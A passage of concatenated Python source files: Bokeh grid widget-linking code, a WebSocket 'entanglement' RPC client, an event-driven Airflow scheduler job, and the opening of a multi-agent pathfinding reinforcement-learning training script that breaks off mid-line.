@staticmethod def link_cells_widgets(grid): for c_id, cell in grid.cells.items(): cell_spaces = cell.get_spaces() for space in cell_spaces: for w_id, w in cell.get_widgets_in_space(space).items(): if w_id in grid.cells_widgets: if space in grid.cells_widgets[w_id]: grid.cells_widgets[w_id][space].append(c_id) else: grid.cells_widgets[w_id][space] = [c_id] ## Every new widget is linked to the corresponding widget (of same name) ## of the 1st space in grid.cells_widgets[w_id] ## Find target cell to link with current cell f_space = list(grid.cells_widgets[w_id].keys())[0] CellWidgets._link_widget_to_target(grid, w, w_id, f_space) else: grid.cells_widgets[w_id] = {} grid.cells_widgets[w_id][space] = [c_id] f_space = list(grid.cells_widgets[w_id].keys())[0] if f_space != space: CellWidgets._link_widget_to_target(grid, w, w_id, f_space) else: w = grid.cells[c_id].get_widget(space, w_id) w.on_change('value', partial(grid.ic.menu_item_click_callback, grid, space, w_id)) @staticmethod def _link_widget_to_target(grid, w, w_id, f_space): if len(grid.cells_widgets[w_id][f_space]): t_c_id = grid.cells_widgets[w_id][f_space][0] t_w = grid.cells[t_c_id].get_widget(f_space, w_id) if t_w is not None and hasattr(t_w,'js_link'): t_w.js_link('value', w, 'value') @staticmethod def set_plotted_widgets_interactive(grid): grid.plotted_widgets = {} for w_id, space_widgets_dict in grid.cells_widgets.items(): w_spaces = list(space_widgets_dict.keys()) if len(w_spaces): f_space = w_spaces[0] f_w_list = space_widgets_dict[f_space] if len(f_w_list): c_id = f_w_list[0] for space in w_spaces: if space not in grid.plotted_widgets: grid.plotted_widgets[space] = {} grid.plotted_widgets[space][w_id] = grid.cells[c_id].get_widget(f_space, w_id) b = Button(label='Reset Diagram', button_type="primary") b.on_click(partial(GlobalReset.global_reset_callback, grid)) for space in grid.spaces: if space not in grid.plotted_widgets: grid.plotted_widgets[space] = {} grid.plotted_widgets[space]["resetButton"] = b @staticmethod def set_plotted_widgets_static(grid): grid.plotted_widgets = {} for w_id, space_widgets_dict in grid.cells_widgets.items(): w_spaces = list(space_widgets_dict.keys()) if len(w_spaces): f_space = w_spaces[0] f_w_list = space_widgets_dict[f_space] if len(f_w_list): c_id = f_w_list[0] for space in w_spaces: if space not in grid.plotted_widgets: grid.plotted_widgets[space] = {} grid.plotted_widgets[space][w_id] = grid.cells[c_id].get_widget(f_space, w_id) for space in grid.spaces: if space not in grid.plotted_widgets: grid.plotted_widgets[space] = {}
client.py
#!/usr/bin/python from autobahn.twisted.websocket import WebSocketClientProtocol, WebSocketClientFactory from twisted.internet import reactor from twisted.internet.ssl import ClientContextFactory import json import hashlib import sys import bcrypt import warnings import ssl import time import traceback from threading import Thread, Condition from entangle.entanglement import Entanglement def create_client(host, port, password, callback, fail, user=None, non_main=False, use_ssl=False, run_reactor=True): class EntanglementClientProtocol(WebSocketClientProtocol): def close_entanglement(self): self.closedByMe = True self.sendClose() def onConnect(self, request): sys.stdout.flush() self.entanglement = Entanglement(self) salt = bcrypt.gensalt().decode("utf-8") saltedPW = password + salt computedHash = hashlib.sha256(saltedPW.encode("utf-8")).hexdigest() if user is None: self.sendMessage("{} {}".format(computedHash, salt).encode("utf-8"), False) else: self.sendMessage("{} {} {}".format(user, computedHash, salt).encode("utf-8"), False) if callback is not None: self.thread = Thread(target=callback, args=(self.entanglement,)) self.thread.setDaemon(True) self.thread.start() def onOpen(self): pass def onMessage(self, payload, isBinary): if not isBinary: packet = json.loads(payload.decode("utf-8")) if "error" in packet: print(packet["error"]) sys.stdout.flush() elif "variable" in packet: self.entanglement._notify(packet["variable"]["name"], packet["variable"]["value"]) elif "call" in packet: call_packet = packet["call"] try: fun = self.entanglement.__getattribute__(call_packet["name"]) args = call_packet["args"] kwargs = call_packet["kwargs"] fun(*args, **kwargs) except: error = traceback.format_exc() errormsg = "Error when invoking {} on entanglement with args {} and kwargs {}.\n{}".format(call_packet["name"], call_packet["args"], call_packet["kwargs"], error) print(errormsg) sys.stdout.flush() result = {"error": errormsg} self.sendMessage(json.dumps(result).encode("utf-8"), False) else: self.close_entanglement() def call_method(self, function, args, kwargs): result = {"call": {"name": function, "args": args, "kwargs": kwargs}} self.sendMessage(json.dumps(result).encode("utf-8"), False) def update_variable(self, name, value): result = {"variable": {"name": name, "value": value}} self.sendMessage(json.dumps(result).encode("utf-8"), False) def onClose(self, wasClean, code, reason): fail() on_close = getattr(self.entanglement, "on_close", None) if callable(on_close): on_close() sys.stdout.flush() reactor.stop() # Use the protocol to create a connection if not use_ssl: factory = WebSocketClientFactory(u"ws://" + host + ":" + str(port)) factory.protocol = EntanglementClientProtocol reactor.connectTCP(host, port, factory) else: factory = WebSocketClientFactory(u"wss://" + host + ":" + str(port)) factory.protocol = EntanglementClientProtocol reactor.connectSSL(host, port, factory, ClientContextFactory()) if run_reactor: if non_main: reactor.run(installSignalHandlers=False) else: reactor.run() class Client(object): def __init__(self, host, port, password, user=None, callback=None, blocking=False, use_ssl=False, run_reactor=True): self._entanglement = None self._failed = False self.thread = None self.condition = Condition() self.callback = callback if blocking: create_client(host, port, password, self.__on_entangle, self.__on_fail, user, use_ssl=use_ssl, run_reactor=run_reactor) else: self.thread = Thread(target=create_client, args=(host, port, password, self.__on_entangle, self.__on_fail, user, True, use_ssl, run_reactor)) self.thread.setDaemon(True) self.thread.start() def __on_entangle(self, entanglement): self._entanglement = entanglement self._entanglement.join = self.join self._entanglement.is_alive = self.is_alive self.condition.acquire() self.condition.notify() self.condition.release() if self.callback is not None: self.callback(entanglement) def __on_fail(self): self._entanglement = None self._failed = True self.condition.acquire() self.condition.notify() self.condition.release() def get_entanglement(self): self.condition.acquire() while self._entanglement is None and not self._failed: self.condition.wait() self.condition.release() return self._entanglement def join(self): if self.thread is not None: self.thread.join() self.thread = None def is_alive(self): if self.thread is not None: return self.thread.is_alive() else: return False def connect(host, port, password, callback=None, user=None, use_ssl=False): if callback is not None: warnings.simplefilter('always', DeprecationWarning) # turn off filter warnings.warn("Do not use callback parameter with this method. Either use Client(...) or connect without callback param. The entanglement will be returned.", category=DeprecationWarning, stacklevel=2) warnings.simplefilter('default', DeprecationWarning) c = Client(host, port, password, callback=callback, user=user, use_ssl=use_ssl) return c.get_entanglement() def connect_blocking(host, port, password, callback, use_ssl=False): warnings.simplefilter('always', DeprecationWarning) # turn off filter warnings.warn("Call to deprecated function connect_blocking(...). Use Client(...) or connect(...) instead.", category=DeprecationWarning, stacklevel=2) warnings.simplefilter('default', DeprecationWarning) Client(host, port, password, callback=callback, blocking=True, use_ssl=use_ssl)
event_based_scheduler_job.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os import sched import signal import sys import threading import time import faulthandler from typing import Callable, List, Optional from airflow.contrib.jobs.periodic_manager import PeriodicManager from airflow.exceptions import SerializedDagNotFound, AirflowException from airflow.models.dagcode import DagCode from airflow.models.message import IdentifiedMessage, MessageState from sqlalchemy import func, not_, or_, asc from sqlalchemy.orm import selectinload from sqlalchemy.orm.session import Session from airflow import models, settings from airflow.configuration import conf from airflow.executors.base_executor import BaseExecutor from airflow.jobs.base_job import BaseJob from airflow.models import DagModel from airflow.models.dag import DagEventDependencies, DAG from airflow.models.dagbag import DagBag from airflow.models.dagrun import DagRun from airflow.models.eventhandler import EventKey from airflow.models.serialized_dag import SerializedDagModel from airflow.models.taskinstance import TaskInstanceKey from airflow.stats import Stats from airflow.utils import timezone from airflow.utils.log.logging_mixin import LoggingMixin from airflow.utils.session import create_session, provide_session from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks from airflow.utils.state import State from airflow.utils.types import DagRunType from airflow.utils.mailbox import Mailbox from airflow.events.scheduler_events import ( StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStatusChangedEvent, EventHandleEvent, RequestEvent, ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil, BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent) from notification_service.base_notification import BaseEvent from notification_service.client import EventWatcher, NotificationClient from airflow.contrib.jobs.dag_trigger import DagTrigger from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId from airflow.executors.scheduling_action import SchedulingAction TI = models.TaskInstance DR = models.DagRun DM = models.DagModel MSG = models.Message class EventBasedScheduler(LoggingMixin): def __init__(self, id, mailbox: Mailbox, task_event_manager: DagRunEventManager, executor: BaseExecutor, notification_client: NotificationClient, context=None, periodic_manager: PeriodicManager = None): super().__init__(context) self.id = id self.mailbox = mailbox self.task_event_manager: DagRunEventManager = task_event_manager self.executor = executor self.notification_client = notification_client self.dagbag = DagBag(read_dags_from_db=True) self._timer_handler = None self.timers = sched.scheduler() self.periodic_manager = periodic_manager def sync(self): def call_regular_interval( delay: float, action: Callable, arguments=(), kwargs={}, ): # pylint: disable=dangerous-default-value def repeat(*args, **kwargs): action(*args, **kwargs) # This is not perfect. If we want a timer every 60s, but action # takes 10s to run, this will run it every 70s. # Good enough for now self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs) self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs) call_regular_interval( delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'), action=self.executor.sync ) self.timers.run() def stop_timer(self): if self.timers and self._timer_handler: self.timers.cancel(self._timer_handler) def submit_sync_thread(self): threading.Thread(target=self.sync).start() def schedule(self) -> bool: identified_message = self.mailbox.get_identified_message() if not identified_message: return True origin_event = identified_message.deserialize() self.log.debug("Event: {}".format(origin_event)) if SchedulerInnerEventUtil.is_inner_event(origin_event): event = SchedulerInnerEventUtil.to_inner_event(origin_event) else: event = origin_event with create_session() as session: if isinstance(event, BaseEvent): dagruns = self._find_dagruns_by_event(event, session) for dagrun in dagruns: dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id) self.task_event_manager.handle_event(dag_run_id, event) elif isinstance(event, RequestEvent): self._process_request_event(event) elif isinstance(event, TaskSchedulingEvent): self._schedule_task(event) elif isinstance(event, TaskStatusChangedEvent): dagrun = self._find_dagrun(event.dag_id, event.execution_date, session) tasks = self._find_scheduled_tasks(dagrun, session) self._send_scheduling_task_events(tasks, SchedulingAction.START) if dagrun.state in State.finished: self.mailbox.send_message(DagRunFinishedEvent(dagrun.run_id).to_event()) elif isinstance(event, DagExecutableEvent): dagrun = self._create_dag_run(event.dag_id, session=session) tasks = self._find_scheduled_tasks(dagrun, session) self._send_scheduling_task_events(tasks, SchedulingAction.START) elif isinstance(event, EventHandleEvent): dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id) assert len(dag_runs) == 1 ti = dag_runs[0].get_task_instance(event.task_id) self._send_scheduling_task_event(ti, event.action) elif isinstance(event, StopDagEvent): self._stop_dag(event.dag_id, session) elif isinstance(event, DagRunFinishedEvent): self._remove_periodic_events(event.run_id) elif isinstance(event, PeriodicEvent): dag_runs = DagRun.find(run_id=event.run_id) assert len(dag_runs) == 1 ti = dag_runs[0].get_task_instance(event.task_id) self._send_scheduling_task_event(ti, SchedulingAction.RESTART) elif isinstance(event, StopSchedulerEvent): self.log.info("{} {}".format(self.id, event.job_id)) if self.id == event.job_id or 0 == event.job_id: self.log.info("break the scheduler event loop.") identified_message.remove_handled_message() session.expunge_all() return False elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent): pass elif isinstance(event, ResponseEvent): pass else: self.log.error("can not handler the event {}".format(event)) identified_message.remove_handled_message() session.expunge_all() return True def stop(self) -> None: self.mailbox.send_message(StopSchedulerEvent(self.id).to_event()) self.log.info("Send stop event to the scheduler.") def recover(self, last_scheduling_id): lost_dag_codes = DagCode.recover_lost_dag_code() self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s", len(lost_dag_codes), lost_dag_codes) self.log.info("Waiting for executor recovery...") self.executor.recover_state() unprocessed_messages = self.get_unprocessed_message(last_scheduling_id) self.log.info("Recovering %s messages of last scheduler job with id: %s", len(unprocessed_messages), last_scheduling_id) for msg in unprocessed_messages: self.mailbox.send_identified_message(msg) @staticmethod def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]: with create_session() as session: results: List[MSG] = session.query(MSG).filter( MSG.scheduling_job_id == last_scheduling_id, MSG.state == MessageState.QUEUED ).order_by(asc(MSG.id)).all() unprocessed: List[IdentifiedMessage] = [] for msg in results: unprocessed.append(IdentifiedMessage(msg.data, msg.id)) return unprocessed def _find_dagrun(self, dag_id, execution_date, session) -> DagRun: dagrun = session.query(DagRun).filter( DagRun.dag_id == dag_id, DagRun.execution_date == execution_date ).first() return dagrun def _register_periodic_events(self, run_id, dag): for task in dag.tasks: if task.executor_config is not None and 'periodic_config' in task.executor_config: self.log.debug('register periodic task {} {}'.format(run_id, task.task_id)) self.periodic_manager.add_task(run_id=run_id, task_id=task.task_id, periodic_config=task.executor_config['periodic_config']) @provide_session def _remove_periodic_events(self, run_id, session=None): dagruns = DagRun.find(run_id=run_id) dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session) for task in dag.tasks: if task.executor_config is not None and 'periodic_config' in task.executor_config: self.log.debug('remove periodic task {} {}'.format(run_id, task.task_id)) self.periodic_manager.remove_task(run_id, task.task_id) def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED) -> DagRun: with prohibit_commit(session) as guard: if settings.USE_JOB_SCHEDULE: """ Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control if/when the next DAGRun should be created """ try: dag = self.dagbag.get_dag(dag_id, session=session) dag_model = session \ .query(DagModel).filter(DagModel.dag_id == dag_id).first() if dag_model is None: return None next_dagrun = dag_model.next_dagrun dag_hash = self.dagbag.dags_hash.get(dag.dag_id) external_trigger = False # register periodic task if run_type == DagRunType.MANUAL: next_dagrun = timezone.utcnow() external_trigger = True dag_run = dag.create_dagrun( run_type=run_type, execution_date=next_dagrun, start_date=timezone.utcnow(), state=State.RUNNING, external_trigger=external_trigger, session=session, dag_hash=dag_hash, creating_job_id=self.id, ) if run_type == DagRunType.SCHEDULED: self._update_dag_next_dagrun(dag_id, session) # commit the session - Release the write lock on DagModel table. guard.commit() # END: create dagrun self._register_periodic_events(dag_run.run_id, dag) return dag_run except SerializedDagNotFound: self.log.exception("DAG '%s' not found in serialized_dag table", dag_id) return None except Exception: self.log.exception("Error occurred when create dag_run of dag: %s", dag_id) def _update_dag_next_dagrun(self, dag_id, session): """ Bulk update the next_dagrun and next_dagrun_create_after for all the dags. We batch the select queries to get info about all the dags at once """ active_runs_of_dag = session \ .query(func.count('*')).filter( DagRun.dag_id == dag_id, DagRun.state == State.RUNNING, DagRun.external_trigger.is_(False), ).scalar() dag_model = session \ .query(DagModel).filter(DagModel.dag_id == dag_id).first() dag = self.dagbag.get_dag(dag_id, session=session) if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs: self.log.info( "DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs", dag.dag_id, active_runs_of_dag, dag.max_active_runs, ) dag_model.next_dagrun_create_after = None else: dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info( dag_model.next_dagrun ) def _schedule_task(self, scheduling_event: TaskSchedulingEvent): task_key = TaskInstanceKey( scheduling_event.dag_id, scheduling_event.task_id, scheduling_event.execution_date, scheduling_event.try_number ) self.executor.schedule_task(task_key, scheduling_event.action) def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]: affect_dag_runs = [] event_key = EventKey(event.key, event.event_type, event.namespace, event.sender) dag_runs = session \ .query(DagRun).filter(DagRun.state == State.RUNNING).all() self.log.debug('dag_runs {}'.format(len(dag_runs))) if dag_runs is None or len(dag_runs) == 0: return affect_dag_runs dags = session.query(SerializedDagModel).filter( SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs) ).all() self.log.debug('dags {}'.format(len(dags))) affect_dags = set() for dag in dags: self.log.debug('dag config {}'.format(dag.event_relationships)) self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace)) dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships) if dep.is_affect(event_key): affect_dags.add(dag.dag_id) if len(affect_dags) == 0: return affect_dag_runs for dag_run in dag_runs: if dag_run.dag_id in affect_dags: affect_dag_runs.append(dag_run) return affect_dag_runs def _find_scheduled_tasks( self, dag_run: DagRun, session: Session, check_execution_date=False ) -> Optional[List[TI]]: """ Make scheduling decisions about an individual dag run ``currently_active_runs`` is passed in so that a batch query can be used to ask this for all dag runs in the batch, to avoid an n+1 query. :param dag_run: The DagRun to schedule :return: scheduled tasks """ if not dag_run or dag_run.get_state() in State.finished: return try: dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session) except SerializedDagNotFound: self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id) return None if not dag: self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id) return None currently_active_runs = session.query( TI.execution_date, ).filter( TI.dag_id == dag_run.dag_id, TI.state.notin_(list(State.finished)), ).all() if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates: self.log.warning("Execution date is in future: %s", dag_run.execution_date) return None if dag.max_active_runs: if ( len(currently_active_runs) >= dag.max_active_runs and dag_run.execution_date not in currently_active_runs ): self.log.info( "DAG %s already has %d active runs, not queuing any tasks for run %s", dag.dag_id, len(currently_active_runs), dag_run.execution_date, ) return None self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session) schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False) dag_run.schedule_tis(schedulable_tis, session) session.commit() query = (session.query(TI) .outerjoin(TI.dag_run) .filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB)) .join(TI.dag_model) .filter(not_(DM.is_paused)) .filter(TI.state == State.SCHEDULED) .options(selectinload('dag_model'))) scheduled_tis: List[TI] = with_row_locks( query, of=TI, **skip_locked(session=session), ).all() # filter need event tasks serialized_dag = session.query(SerializedDagModel).filter( SerializedDagModel.dag_id == dag_run.dag_id).first() final_scheduled_tis = [] event_task_set = [] if serialized_dag: dep: DagEventDependencies = DagEventDependencies.from_json(serialized_dag.event_relationships) event_task_set = dep.find_event_dependencies_tasks() else: self.log.error("Failed to get serialized_dag from db, unexpected dag id: %s", dag_run.dag_id) for ti in scheduled_tis: if ti.task_id not in event_task_set: final_scheduled_tis.append(ti) return final_scheduled_tis @provide_session def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None): """Only run DagRun.verify integrity if Serialized DAG has changed since it is slow""" latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session) if dag_run.dag_hash == latest_version: self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id) return dag_run.dag_hash = latest_version # Refresh the DAG dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session) # Verify integrity also takes care of session.flush dag_run.verify_integrity(session=session) def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction): if ti is None or action == SchedulingAction.NONE: return task_scheduling_event = TaskSchedulingEvent( ti.task_id, ti.dag_id, ti.execution_date, ti.try_number, action ) self.mailbox.send_message(task_scheduling_event.to_event()) def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction): if tis is None: return for ti in tis: self._send_scheduling_task_event(ti, action) @provide_session def _emit_pool_metrics(self, session: Session = None) -> None: pools = models.Pool.slots_stats(session=session) for pool_name, slot_stats in pools.items(): Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"]) Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) @staticmethod def _reset_unfinished_task_state(dag_run): with create_session() as session: to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]] tis = dag_run.get_task_instances(to_be_reset, session) for ti in tis: ti.state = State.NONE session.commit() @provide_session def restore_unfinished_dag_run(self, session): dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all() if not dag_runs or len(dag_runs) == 0: return for dag_run in dag_runs: self._reset_unfinished_task_state(dag_run) tasks = self._find_scheduled_tasks(dag_run, session) self._send_scheduling_task_events(tasks, SchedulingAction.START) @provide_session def heartbeat_callback(self, session: Session = None) -> None: Stats.incr('scheduler_heartbeat', 1, 1) @provide_session def _process_request_event(self, event: RequestEvent, session: Session = None): try: message = BaseUserDefineMessage() message.from_json(event.body) if message.message_type == UserDefineMessageType.RUN_DAG: # todo make sure dag file is parsed. dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL) if not dagrun: self.log.error("Failed to create dag_run.") # TODO Need to add ret_code and errro_msg in ExecutionContext in case of exception self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event()) return tasks = self._find_scheduled_tasks(dagrun, session, False) self._send_scheduling_task_events(tasks, SchedulingAction.START) self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event()) elif message.message_type == UserDefineMessageType.STOP_DAG_RUN: dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id) self._stop_dag_run(dag_run) self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event()) elif message.message_type == UserDefineMessageType.EXECUTE_TASK: dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id) ti: TI = dagrun.get_task_instance(task_id=message.task_id) self.mailbox.send_message(TaskSchedulingEvent( task_id=ti.task_id, dag_id=ti.dag_id, execution_date=ti.execution_date, try_number=ti.try_number, action=SchedulingAction(message.action) ).to_event()) self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event()) except Exception: self.log.exception("Error occurred when processing request event.") def _stop_dag(self, dag_id, session: Session): """ Stop the dag. Pause the dag and cancel all running dag_runs and task_instances. """ DagModel.get_dagmodel(dag_id, session)\ .set_is_paused(is_paused=True, including_subdags=True, session=session) active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING) for dag_run in active_runs: self._stop_dag_run(dag_run) def _stop_dag_run(self, dag_run: DagRun): dag_run.stop_dag_run() for ti in dag_run.get_task_instances(): if ti.state in State.unfinished: self.executor.schedule_task(ti.key, SchedulingAction.STOP) self.mailbox.send_message(DagRunFinishedEvent(run_id=dag_run.run_id).to_event()) class SchedulerEventWatcher(EventWatcher): def __init__(self, mailbox): self.mailbox = mailbox def process(self, events: List[BaseEvent]): for e in events: self.mailbox.send_message(e) class EventBasedSchedulerJob(BaseJob): """ 1. todo self heartbeat 2. todo check other scheduler failed 3. todo timeout dagrun """ __mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'} def __init__(self, dag_directory, server_uri=None, max_runs=-1, refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1), *args, **kwargs): super().__init__(*args, **kwargs) self.mailbox: Mailbox = Mailbox() self.dag_trigger: DagTrigger = DagTrigger( dag_directory=dag_directory, max_runs=max_runs, dag_ids=None, pickle_dags=False, mailbox=self.mailbox, refresh_dag_dir_interval=refresh_dag_dir_interval, notification_service_uri=server_uri ) self.task_event_manager = DagRunEventManager(self.mailbox) self.executor.set_mailbox(self.mailbox) self.notification_client: NotificationClient = NotificationClient(server_uri=server_uri, default_namespace=SCHEDULER_NAMESPACE) self.periodic_manager = PeriodicManager(self.mailbox) self.scheduler: EventBasedScheduler = EventBasedScheduler( self.id, self.mailbox, self.task_event_manager, self.executor, self.notification_client, None, self.periodic_manager ) self.last_scheduling_id = self._last_scheduler_job_id() @staticmethod def _last_scheduler_job_id(): last_run = EventBasedSchedulerJob.most_recent_job() if not last_run: return None else: return last_run.id def _execute(self): # faulthandler.enable() self.log.info("Starting the scheduler Job") # DAGs can be pickled for easier remote execution by some executors # pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS try: self.mailbox.set_scheduling_job_id(self.id) self.scheduler.id = self.id self._start_listen_events() self.dag_trigger.start() self.task_event_manager.start() self.executor.job_id = self.id self.executor.start() self.periodic_manager.start() self.register_signals() # Start after resetting orphaned tasks to avoid stressing out DB. execute_start_time = timezone.utcnow() self.scheduler.submit_sync_thread() self.scheduler.recover(self.last_scheduling_id) self._run_scheduler_loop() self._stop_listen_events() self.periodic_manager.shutdown() self.dag_trigger.end() self.task_event_manager.end() self.executor.end() settings.Session.remove() # type: ignore except Exception as e: # pylint: disable=broad-except self.log.exception("Exception when executing scheduler, %s", e) finally: self.log.info("Exited execute loop") def _run_scheduler_loop(self) -> None: self.log.info("Starting the scheduler loop.") self.scheduler.restore_unfinished_dag_run() should_continue = True while should_continue: should_continue = self.scheduler.schedule() self.heartbeat(only_if_necessary=True) self.scheduler.stop_timer() def _start_listen_events(self): watcher = SchedulerEventWatcher(self.mailbox) self.notification_client.start_listen_events( watcher=watcher, start_time=int(time.time() * 1000), version=None ) def _stop_listen_events(self): self.notification_client.stop_listen_events() def register_signals(self) -> None: """Register signals that stop child processes""" signal.signal(signal.SIGINT, self._exit_gracefully) signal.signal(signal.SIGTERM, self._exit_gracefully) signal.signal(signal.SIGUSR2, self._debug_dump) def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument """Helper method to clean up processor_agent to avoid leaving orphan processes.""" self.log.info("Exiting gracefully upon receiving signal %s", signum) sys.exit(os.EX_OK) def _debug_dump(self, signum, frame): # pylint: disable=unused-argument try: sig_name = signal.Signals(signum).name # pylint: disable=no-member except Exception: # pylint: disable=broad-except sig_name = str(signum) self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80) self.executor.debug_dump() self.log.info("-" * 80) def is_alive(self, grace_multiplier: Optional[float] = None) -> bool: """ Is this SchedulerJob alive? We define alive as in a state of running and a heartbeat within the threshold defined in the ``scheduler_health_check_threshold`` config setting. ``grace_multiplier`` is accepted for compatibility with the parent class. :rtype: boolean """ if grace_multiplier is not None: # Accept the same behaviour as superclass return super().is_alive(grace_multiplier=grace_multiplier) scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold') return ( self.state == State.RUNNING and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold )
train.py
#this should be the thing, right? from __future__ import division import gym import numpy as np import random import tensorflow as tf import tensorflow.contrib.layers as layers import matplotlib.pyplot as plt import cpp_mstar from od_mstar3.col_set_addition import OutOfTimeError,NoSolutionError import threading import time import scipy.signal as signal import os import GroupLock import multiprocessing import mapf_gym as mapf_gym import pickle import imageio from ACNet import ACNet from tensorflow.python.client import device_lib dev_list = device_lib.list_local_devices() print(dev_list) #assert len(dev_list) > 1 def make_gif(images, fname, duration=2, true_image=False,salience=False,salIMGS=None): imageio.mimwrite(fname,images,subrectangles=True) print("wrote gif") # Copies one set of variables to another. # Used to set worker network parameters to those of global network. def update_target_graph(from_scope,to_scope): from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope) to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope) op_holder = [] for from_var,to_var in zip(from_vars,to_vars): op_holder.append(to_var.assign(from_var)) return op_holder def discount(x, gamma): return signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1] def good_discount(x, gamma): return discount(x,gamma) class Worker: def __init__(self, game, metaAgentID, workerID, a_size, groupLock): self.workerID = workerID self.env = game self.metaAgentID = metaAgentID self.name = "worker_"+str(workerID) self.agentID = ((workerID-1) % num_workers) + 1 self.groupLock = groupLock self.nextGIF = episode_count # For GIFs output #Create the local copy of the network and the tensorflow op to copy global parameters to local network self.local_AC = ACNet(self.name,a_size,trainer,True,GRID_SIZE,GLOBAL_NET_SCOPE) self.pull_global = update_target_graph(GLOBAL_NET_SCOPE, self.name) def synchronize(self): #handy thing for keeping track of which to release and acquire if(not hasattr(self,"lock_bool")): self.lock_bool=False self.groupLock.release(int(self.lock_bool),self.name) self.groupLock.acquire(int(not self.lock_bool),self.name) self.lock_bool=not self.lock_bool def train(self, rollout, sess, gamma, bootstrap_value,imitation=False): global episode_count if imitation: rollout=np.array(rollout) #we calculate the loss differently for imitation #if imitation=True the rollout is assumed to have different dimensions: #[o[0],o[1],optimal_actions] rnn_state = self.local_AC.state_init print('rollout', rollout.shape) feed_dict={global_step:episode_count, self.local_AC.inputs:np.stack(rollout[:,0]), self.local_AC.goal_pos:np.stack(rollout[:,1]), self.local_AC.optimal_actions:np.stack(rollout[:,2]), self.local_AC.state_in[0]:rnn_state[0], self.local_AC.state_in[1]:rnn_state[1] } _,i_l,_=sess.run([self.local_AC.policy,self.local_AC.imitation_loss, self.local_AC.apply_imitation_grads], feed_dict=feed_dict) return i_l rollout = np.array(rollout) observations = rollout[:,0] goals=rollout[:,-2] actions = rollout[:,1] rewards = rollout[:,2] values = rollout[:,5] valids = rollout[:,6] blockings = rollout[:,10] on_goals=rollout[:,8] train_value = rollout[:,-1] # Here we take the rewards and values from the rollout, and use them to # generate the advantage and discounted returns. (With bootstrapping) # The advantage function uses "Generalized Advantage Estimation" self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value]) discounted_rewards = discount(self.rewards_plus,gamma)[:-1] self.value_plus = np.asarray(values.tolist() + [bootstrap_value]) advantages = rewards + gamma * self.value_plus[1:] - 